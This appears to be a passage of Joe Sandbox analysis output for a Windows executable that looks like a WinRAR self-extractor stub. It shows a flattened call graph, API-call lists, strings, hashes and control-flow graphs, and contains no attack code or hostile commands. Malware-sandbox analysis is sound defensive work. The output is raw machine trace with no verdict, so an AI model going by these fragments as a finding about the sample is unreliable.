25009->25014 25011 e9e1c6 25065 e9e27c 78 API calls 25011->25065 25013->25008 25015 e9e22d 25014->25015 25016 eb6310 26 API calls 25015->25016 25016->25003 25018 ea1da7 WideCharToMultiByte 25018->25020 25020->25003 25020->25004 25020->25018 25058 e9e5b1 50 API calls __vsnprintf 25020->25058 25059 eb6159 26 API calls 3 library calls 25020->25059 25060 eb8cce 26 API calls ___std_exception_copy 25020->25060 25061 eb7625 26 API calls ___std_exception_copy 25020->25061 25062 e9e27c 78 API calls 25020->25062 25024 e9da55 25023->25024 25024->24933 25026 e998ea 25025->25026 25027 e9994b CreateFileW 25026->25027 25028 e9996c GetLastError 25027->25028 25032 e999bb 25027->25032 25029 e9bb03 GetCurrentDirectoryW 25028->25029 25030 e9998c 25029->25030 25031 e99990 CreateFileW GetLastError 25030->25031 25030->25032 25031->25032 25034 e999b5 25031->25034 25033 e999ff 25032->25033 25035 e999e5 SetFileTime 25032->25035 25033->24990 25034->25032 25035->25033 25037 eb6349 25036->25037 25038 eb634d 25037->25038 25049 eb6375 25037->25049 25066 eb91a8 20 API calls __dosmaperr 25038->25066 25040 eb6352 25067 eb9087 26 API calls ___std_exception_copy 25040->25067 25041 eb6699 25043 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25041->25043 25045 eb66a6 25043->25045 25044 eb635d 25046 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25044->25046 25045->24991 25047 eb6369 25046->25047 25047->24991 25049->25041 25068 eb6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25049->25068 25051 e99bdc 25050->25051 25052 e99be3 25050->25052 25051->25000 25052->25051 25054 e99785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25052->25054 25069 e96d1a 77 API calls 25052->25069 25054->25052 25055->25000 25056->24997 25057->25020 25058->25020 25059->25020 25060->25020 25061->25020 25062->25020 25063->25006 25064->25011 25065->25008 25066->25040 25067->25044 25068->25049 25069->25052 25071 eb7ce1 _abort 25070->25071 
25072 eb7cfa 25071->25072 25073 eb7ce8 25071->25073 25094 ebac31 EnterCriticalSection 25072->25094 25106 eb7e2f GetModuleHandleW 25073->25106 25076 eb7ced 25076->25072 25107 eb7e73 GetModuleHandleExW 25076->25107 25077 eb7d9f 25095 eb7ddf 25077->25095 25081 eb7d76 25086 eb7d8e 25081->25086 25090 eb8a91 _abort 5 API calls 25081->25090 25083 eb7d01 25083->25077 25083->25081 25115 eb87e0 20 API calls _abort 25083->25115 25084 eb7de8 25116 ec2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25084->25116 25085 eb7dbc 25098 eb7dee 25085->25098 25091 eb8a91 _abort 5 API calls 25086->25091 25090->25086 25091->25077 25094->25083 25117 ebac81 LeaveCriticalSection 25095->25117 25097 eb7db8 25097->25084 25097->25085 25118 ebb076 25098->25118 25101 eb7e1c 25104 eb7e73 _abort 8 API calls 25101->25104 25102 eb7dfc GetPEB 25102->25101 25103 eb7e0c GetCurrentProcess TerminateProcess 25102->25103 25103->25101 25105 eb7e24 ExitProcess 25104->25105 25106->25076 25108 eb7e9d GetProcAddress 25107->25108 25109 eb7ec0 25107->25109 25110 eb7eb2 25108->25110 25111 eb7ecf 25109->25111 25112 eb7ec6 FreeLibrary 25109->25112 25110->25109 25113 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25111->25113 25112->25111 25114 eb7cf9 25113->25114 25114->25072 25115->25081 25117->25097 25119 ebb09b 25118->25119 25123 ebb091 25118->25123 25120 ebac98 _abort 5 API calls 25119->25120 25120->25123 25121 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25122 eb7df8 25121->25122 25122->25101 25122->25102 25123->25121 25309 eab1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25277 eac793 97 API calls 4 library calls 25312 eab18d 78 API calls 25313 ea9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25333 eac793 102 API calls 5 library calls 25279 ebb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25281 eac793 107 API calls 5 library calls 23334 eae569 23335 eae517 23334->23335 
23335->23334 23337 eae85d 23335->23337 23363 eae5bb 23337->23363 23339 eae86d 23340 eae8ca 23339->23340 23341 eae8ee 23339->23341 23342 eae7fb DloadReleaseSectionWriteAccess 6 API calls 23340->23342 23345 eae966 LoadLibraryExA 23341->23345 23347 eae9c7 23341->23347 23348 eae9d9 23341->23348 23358 eaea95 23341->23358 23343 eae8d5 RaiseException 23342->23343 23344 eaeac3 23343->23344 23344->23335 23346 eae979 GetLastError 23345->23346 23345->23347 23351 eae98c 23346->23351 23352 eae9a2 23346->23352 23347->23348 23350 eae9d2 FreeLibrary 23347->23350 23349 eaea37 GetProcAddress 23348->23349 23348->23358 23354 eaea47 GetLastError 23349->23354 23349->23358 23350->23348 23351->23347 23351->23352 23353 eae7fb DloadReleaseSectionWriteAccess 6 API calls 23352->23353 23355 eae9ad RaiseException 23353->23355 23356 eaea5a 23354->23356 23355->23344 23356->23358 23359 eae7fb DloadReleaseSectionWriteAccess 6 API calls 23356->23359 23372 eae7fb 23358->23372 23360 eaea7b RaiseException 23359->23360 23361 eae5bb ___delayLoadHelper2@8 6 API calls 23360->23361 23362 eaea92 23361->23362 23362->23358 23364 eae5ed 23363->23364 23365 eae5c7 23363->23365 23364->23339 23380 eae664 23365->23380 23367 eae5cc 23369 eae5e8 23367->23369 23383 eae78d 23367->23383 23388 eae5ee GetModuleHandleW GetProcAddress GetProcAddress 23369->23388 23371 eae836 23371->23339 23373 eae82f 23372->23373 23374 eae80d 23372->23374 23373->23344 23375 eae664 DloadReleaseSectionWriteAccess 3 API calls 23374->23375 23376 eae812 23375->23376 23377 eae82a 23376->23377 23378 eae78d DloadProtectSection 3 API calls 23376->23378 23391 eae831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23377->23391 23378->23377 23389 eae5ee GetModuleHandleW GetProcAddress GetProcAddress 23380->23389 23382 eae669 23382->23367 23385 eae7a2 DloadProtectSection 23383->23385 23384 eae7a8 23384->23369 23385->23384 23386 eae7dd VirtualProtect 23385->23386 23390 eae6a3 VirtualQuery GetSystemInfo 23385->23390 
23386->23384 23388->23371 23389->23382 23390->23386 23391->23373 25334 eb8268 55 API calls _free 25353 eb7f6e 52 API calls 3 library calls 24458 e99f7a 24459 e99f88 24458->24459 24460 e99f8f 24458->24460 24461 e99f9c GetStdHandle 24460->24461 24468 e99fab 24460->24468 24461->24468 24462 e9a003 WriteFile 24462->24468 24463 e99fcf 24464 e99fd4 WriteFile 24463->24464 24463->24468 24464->24463 24464->24468 24466 e9a095 24470 e96e98 77 API calls 24466->24470 24468->24459 24468->24462 24468->24463 24468->24464 24468->24466 24469 e96baa 78 API calls 24468->24469 24469->24468 24470->24459 25283 eaa070 10 API calls 25335 eab270 99 API calls 25355 e91f72 128 API calls __EH_prolog 25285 e91075 84 API calls 24519 e99a74 24522 e99a7e 24519->24522 24520 e99b9d SetFilePointer 24521 e99bb6 GetLastError 24520->24521 24525 e99ab1 24520->24525 24521->24525 24522->24520 24523 e9981a 79 API calls 24522->24523 24524 e99b79 24522->24524 24522->24525 24523->24524 24524->24520 25286 eaa440 GdipCloneImage GdipAlloc 25336 eb3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25357 ec1f40 CloseHandle 24543 eacd58 24544 eace22 24543->24544 24550 eacd7b _wcschr 24543->24550 24555 eac793 _wcslen _wcsrchr 24544->24555 24571 ead78f 24544->24571 24545 eab314 ExpandEnvironmentStringsW 24545->24555 24547 ead40a 24549 ea1fbb CompareStringW 24549->24550 24550->24544 24550->24549 24551 eaca67 SetWindowTextW 24551->24555 24554 eb3e3e 22 API calls 24554->24555 24555->24545 24555->24547 24555->24551 24555->24554 24557 eac855 SetFileAttributesW 24555->24557 24562 eacc31 GetDlgItem SetWindowTextW SendMessageW 24555->24562 24566 eacc71 SendMessageW 24555->24566 24570 ea1fbb CompareStringW 24555->24570 24593 eaa64d GetCurrentDirectoryW 24555->24593 24595 e9a5d1 6 API calls 24555->24595 24596 e9a55a FindClose 24555->24596 24597 eab48e 76 API calls 2 library calls 24555->24597 24559 eac90f GetFileAttributesW 24557->24559 24569 eac86f _abort _wcslen 24557->24569 24559->24555 24561 eac921 
DeleteFileW 24559->24561 24561->24555 24563 eac932 24561->24563 24562->24555 24564 e94092 _swprintf 51 API calls 24563->24564 24565 eac952 GetFileAttributesW 24564->24565 24565->24563 24567 eac967 MoveFileW 24565->24567 24566->24555 24567->24555 24568 eac97f MoveFileExW 24567->24568 24568->24555 24569->24555 24569->24559 24594 e9b991 51 API calls 3 library calls 24569->24594 24570->24555 24574 ead799 _abort _wcslen 24571->24574 24572 ead9e7 24572->24555 24573 ead9c0 24573->24572 24578 ead9de ShowWindow 24573->24578 24574->24572 24574->24573 24575 ead8a5 24574->24575 24598 ea1fbb CompareStringW 24574->24598 24577 e9a231 3 API calls 24575->24577 24579 ead8ba 24577->24579 24578->24572 24585 ead8d1 24579->24585 24599 e9b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24579->24599 24581 ead925 24600 eadc3b 6 API calls 24581->24600 24582 ead97b CloseHandle 24583 ead994 24582->24583 24584 ead989 24582->24584 24583->24573 24601 ea1fbb CompareStringW 24584->24601 24585->24572 24585->24581 24585->24582 24588 ead91b ShowWindow 24585->24588 24588->24581 24589 ead93d 24589->24582 24590 ead950 GetExitCodeProcess 24589->24590 24590->24582 24591 ead963 24590->24591 24591->24582 24593->24555 24594->24569 24595->24555 24596->24555 24597->24555 24598->24575 24599->24585 24600->24589 24601->24583 25288 eae455 14 API calls ___delayLoadHelper2@8 25318 ebb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25290 ebf421 21 API calls __vswprintf_c_l 25338 eac220 93 API calls _swprintf 25292 e91025 29 API calls 25319 eaf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25360 eaff30 LocalFree 25127 ebbb30 25128 ebbb42 25127->25128 25129 ebbb39 25127->25129 25131 ebba27 25129->25131 25132 eb97e5 _abort 38 API calls 25131->25132 25133 ebba34 25132->25133 25151 ebbb4e 25133->25151 25135 ebba3c 25160 ebb7bb 25135->25160 25138 ebba53 25138->25128 25139 eb8e06 __vswprintf_c_l 21 API calls 25140 ebba64 
25139->25140 25150 ebba96 25140->25150 25167 ebbbf0 25140->25167 25143 eb8dcc _free 20 API calls 25143->25138 25144 ebba91 25177 eb91a8 20 API calls __dosmaperr 25144->25177 25145 ebbaae 25147 ebbada 25145->25147 25148 eb8dcc _free 20 API calls 25145->25148 25147->25150 25178 ebb691 26 API calls 25147->25178 25148->25147 25150->25143 25152 ebbb5a __FrameHandler3::FrameUnwindToState 25151->25152 25153 eb97e5 _abort 38 API calls 25152->25153 25158 ebbb64 25153->25158 25155 ebbbe8 _abort 25155->25135 25158->25155 25159 eb8dcc _free 20 API calls 25158->25159 25179 eb8d24 38 API calls _abort 25158->25179 25180 ebac31 EnterCriticalSection 25158->25180 25181 ebbbdf LeaveCriticalSection _abort 25158->25181 25159->25158 25161 eb4636 __fassign 38 API calls 25160->25161 25162 ebb7cd 25161->25162 25163 ebb7ee 25162->25163 25164 ebb7dc GetOEMCP 25162->25164 25165 ebb805 25163->25165 25166 ebb7f3 GetACP 25163->25166 25164->25165 25165->25138 25165->25139 25166->25165 25168 ebb7bb 40 API calls 25167->25168 25169 ebbc0f 25168->25169 25172 ebbc60 IsValidCodePage 25169->25172 25174 ebbc16 25169->25174 25176 ebbc85 _abort 25169->25176 25170 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25171 ebba89 25170->25171 25171->25144 25171->25145 25173 ebbc72 GetCPInfo 25172->25173 25172->25174 25173->25174 25173->25176 25174->25170 25182 ebb893 GetCPInfo 25176->25182 25177->25150 25178->25150 25180->25158 25181->25158 25183 ebb977 25182->25183 25184 ebb8cd 25182->25184 25187 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25183->25187 25192 ebc988 25184->25192 25189 ebba23 25187->25189 25189->25174 25191 ebab78 __vswprintf_c_l 43 API calls 25191->25183 25193 eb4636 __fassign 38 API calls 25192->25193 25194 ebc9a8 MultiByteToWideChar 25193->25194 25196 ebca7e 25194->25196 25197 ebc9e6 25194->25197 25198 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25196->25198 25199 ebca07 _abort __vsnwprintf_l 25197->25199 

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00EA087C
                                                                                                                          • Part of subcall function 00EA0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EA088E
                                                                                                                          • Part of subcall function 00EA0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EA08BF
                                                                                                                          • Part of subcall function 00EAA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00EAA655
                                                                                                                          • Part of subcall function 00EAAC16: OleInitialize.OLE32(00000000), ref: 00EAAC2F
                                                                                                                          • Part of subcall function 00EAAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EAAC66
                                                                                                                          • Part of subcall function 00EAAC16: SHGetMalloc.SHELL32(00ED8438), ref: 00EAAC70
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00EADF5C
                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00EADF83
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00EADF94
                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00EADFCE
                                                                                                                          • Part of subcall function 00EADBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EADBF4
                                                                                                                          • Part of subcall function 00EADBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EADC30
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EADFD7
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00EEEC90,00000800), ref: 00EADFF2
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00EEEC90), ref: 00EADFFE
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00EAE009
                                                                                                                        • _swprintf.LIBCMT ref: 00EAE048
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00EAE05A
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00EAE061
                                                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 00EAE078
                                                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00EAE0C9
                                                                                                                        • Sleep.KERNEL32(?), ref: 00EAE0F7
                                                                                                                        • DeleteObject.GDI32 ref: 00EAE130
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EAE140
                                                                                                                        • CloseHandle.KERNEL32 ref: 00EAE183
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                        • API String ID: 3049964643-271953491
                                                                                                                        • Opcode ID: dcc7abda744af4a4c5c6ec764165200e287081b0a2b67f12c4dd1f8764171891
                                                                                                                        • Instruction ID: 86c34149c2d4913030fa896d93de7de665401f9c293b9e419b02f8bac4a0e058
                                                                                                                        • Opcode Fuzzy Hash: dcc7abda744af4a4c5c6ec764165200e287081b0a2b67f12c4dd1f8764171891
                                                                                                                        • Instruction Fuzzy Hash: 64613B71505344AFD320AB76EC89F6B77ECEB4E304F04142AF446BA291DB74A94CC761

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 802 eaa6c2-eaa6df FindResourceW 803 eaa7db 802->803 804 eaa6e5-eaa6f6 SizeofResource 802->804 805 eaa7dd-eaa7e1 803->805 804->803 806 eaa6fc-eaa70b LoadResource 804->806 806->803 807 eaa711-eaa71c LockResource 806->807 807->803 808 eaa722-eaa737 GlobalAlloc 807->808 809 eaa73d-eaa746 GlobalLock 808->809 810 eaa7d3-eaa7d9 808->810 811 eaa7cc-eaa7cd GlobalFree 809->811 812 eaa74c-eaa76a call eb0320 809->812 810->805 811->810 816 eaa76c-eaa78e call eaa626 812->816 817 eaa7c5-eaa7c6 GlobalUnlock 812->817 816->817 822 eaa790-eaa798 816->822 817->811 823 eaa79a-eaa7ae GdipCreateHBITMAPFromBitmap 822->823 824 eaa7b3-eaa7c1 822->824 823->824 825 eaa7b0 823->825 824->817 825->824
                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6D5
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA6EC
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA703
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,00EAB73D,00000066), ref: 00EAA712
                                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00EAB73D,00000066), ref: 00EAA72D
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EAA73E
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00EAA762
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EAA7C6
                                                                                                                          • Part of subcall function 00EAA626: GdipAlloc.GDIPLUS(00000010), ref: 00EAA62C
                                                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00EAA7A7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                        • String ID: Fjun$PNG
                                                                                                                        • API String ID: 211097158-1136719808
                                                                                                                        • Opcode ID: c55a331b62d2a0165217ef707bb06917a2c9b331978d4a24ac1985a036837a80
                                                                                                                        • Instruction ID: 055c81351f98a266f44b975c1ee45a6c65cefe538c0c1971774dcc03e06f39ce
                                                                                                                        • Opcode Fuzzy Hash: c55a331b62d2a0165217ef707bb06917a2c9b331978d4a24ac1985a036837a80
                                                                                                                        • Instruction Fuzzy Hash: E731D771601301AFD7119F32EC48D1BBFB8EF89754B08553AF805B6220DB32EC49CA51

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1032 e9a69b-e9a6bf call eaec50 1035 e9a6c1-e9a6ce FindFirstFileW 1032->1035 1036 e9a727-e9a730 FindNextFileW 1032->1036 1037 e9a742-e9a7ff call ea0602 call e9c310 call ea15da * 3 1035->1037 1039 e9a6d0-e9a6e2 call e9bb03 1035->1039 1036->1037 1038 e9a732-e9a740 GetLastError 1036->1038 1043 e9a804-e9a811 1037->1043 1040 e9a719-e9a722 1038->1040 1047 e9a6fe-e9a707 GetLastError 1039->1047 1048 e9a6e4-e9a6fc FindFirstFileW 1039->1048 1040->1043 1050 e9a709-e9a70c 1047->1050 1051 e9a717 1047->1051 1048->1037 1048->1047 1050->1051 1052 e9a70e-e9a711 1050->1052 1051->1040 1052->1051 1054 e9a713-e9a715 1052->1054 1054->1040
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6C4
                                                                                                                          • Part of subcall function 00E9BB03: _wcslen.LIBCMT ref: 00E9BB27
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6F2
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A6FE
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A728
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00E9A592,000000FF,?,?), ref: 00E9A734
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 42610566-0
                                                                                                                        • Opcode ID: 4f017790035b84a3fd138b08b97a32cfd47ab0518a40ded9a6a319d16354c2ce
                                                                                                                        • Instruction ID: 3cd78dd62d70597cff76066ac81a4f610cd80ac02d69b8129661981cd14e8292
                                                                                                                        • Opcode Fuzzy Hash: 4f017790035b84a3fd138b08b97a32cfd47ab0518a40ded9a6a319d16354c2ce
                                                                                                                        • Instruction Fuzzy Hash: E4418F72900515ABCB25DF64CC89AEAB7B9FF48350F1441A6E96DF3240D734AE94CF90
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002,00000000), ref: 00EB7E0F
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00EB7DC4,00000000,00ECC300,0000000C,00EB7F1B,00000000,00000002,00000000), ref: 00EB7E16
                                                                                                                        • ExitProcess.KERNEL32 ref: 00EB7E28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 164f74a01a201edebc399d926b0a645e3062ad6b62ae7b9db3ee10d4f61da7ec
                                                                                                                        • Instruction ID: 59073ca2db2a386d23882ea111c7b61f392ed1b6a359dac4b2a22bfff5fbdd65
                                                                                                                        • Opcode Fuzzy Hash: 164f74a01a201edebc399d926b0a645e3062ad6b62ae7b9db3ee10d4f61da7ec
                                                                                                                        • Instruction Fuzzy Hash: 03E04F31000144EFCF017F22CD0AD8A3F6AEF40341B008468F955AA532CB36DE56CB80
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 779523d3617f3df752646d0d9b47bc527d29595313c38bb9140c4106f8059bbe
                                                                                                                        • Instruction ID: 7d69768c9177769c9ea2333a64b20a2abbecb35eb9b8a6c343394c1ba61bbfab
                                                                                                                        • Opcode Fuzzy Hash: 779523d3617f3df752646d0d9b47bc527d29595313c38bb9140c4106f8059bbe
                                                                                                                        • Instruction Fuzzy Hash: CA822E70904245AEDF15DF64C991BFAB7B9BF06304F0861BAD849BB263DB315A88C760
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00EAB7E5
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EAB8D1
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB8EF
                                                                                                                        • IsDialogMessageW.USER32(?,?), ref: 00EAB902
                                                                                                                        • TranslateMessage.USER32(?), ref: 00EAB910
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00EAB91A
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00EAB93D
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00EAB960
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 00EAB983
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EAB99E
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00EC35F4), ref: 00EAB9B1
                                                                                                                          • Part of subcall function 00EAD453: _wcschr.LIBVCRUNTIME ref: 00EAD45C
                                                                                                                          • Part of subcall function 00EAD453: _wcslen.LIBCMT ref: 00EAD47D
